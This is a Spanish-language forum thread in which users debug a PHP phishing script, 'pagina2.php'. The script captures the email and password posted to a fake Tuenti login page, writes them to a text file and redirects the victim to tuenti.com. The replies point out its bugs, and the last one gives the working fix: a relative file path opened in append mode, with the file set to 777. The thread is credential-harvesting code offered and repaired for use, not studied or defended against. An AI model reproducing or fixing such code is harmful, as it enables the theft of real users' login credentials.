sod escribió:Tiene varios fallos (vamos que segun lo subes es imposible que funcione), te pongo lo que esta malpara arreglar esto deberias ponerlo para que se escribiera en el servidor de cada persona, pero si aun quieres que se escriba en tu servidor (yo personalmente no lo haria asi, porque cualquiera puede ver la pass, pero bueno), tendrias que crear otro php para recibir los datos en tu servidor y que lo escriba en ese txt (si no sabes como avisa)//pagina2.php
<?php
$id=$_POST['email']; // Bien
$pass=$_POST['input_password']; // Bien
$master=fopen('[Enlace externo eliminado para invitados] // Aqui ya empieza a estar mal (me refiero a que esta bien se puede abrir asi pero para leerlo...)
fwrite($master,"
email: ".$id." ...NEK&CALIMERO... pass: " .$pass." "); // Esto es ya imposible no puedes escribir en un txt asi como asi de otra pagina, si se pudiera podias "defacear" cualquier web
$master=fopen('[Enlace externo eliminado para invitados]); // No se porque lo abres otra vez
fclose($master); // y cierras
echo "<meta http-equiv='Refresh' content='1;url=http://www.tuenti.com'>"; // Esto esta bien, hay otras formas pero funciona que es lo importante
?>
Saludos
hola xD me considero un experto en php y digo lo mismo solo hago unas correcciones sod
de hecho xD si en efecto esta mal pero la razon que pones tambien esta mal xD si se abre asi se abre para modo escritura y se coloca el puntero al final y no se edita el archivo es decir si pones w se borra lo que tenia y se sobreescribe con a el puntero se coloca alfinal el codigo correcto es asi:$master=fopen('[Enlace externo eliminado para invitados] // Aqui ya empieza a estar mal (me refiero a que esta bien se puede abrir asi pero para leerlo...)
$master=fopen('[Enlace externo eliminado para invitados]");
si lo quieres leer es r en vez de a
fwrite($master,"
email: ".$id." ...NEK&CALIMERO... pass: " .$pass." "); // Esto es ya imposible no puedes escribir en un txt asi como asi de otra pagina, si se pudiera podias "defacear" cualquier web
si tambien esta mal pero... es cierto que no se puede escribir asi en una url externa pero para eso solo hay que cambiar la ruta fija por relativa asi:
$master=fopen('datos.txt',"a");
y dar 777 a datos.txt
lo demas tienes razon =)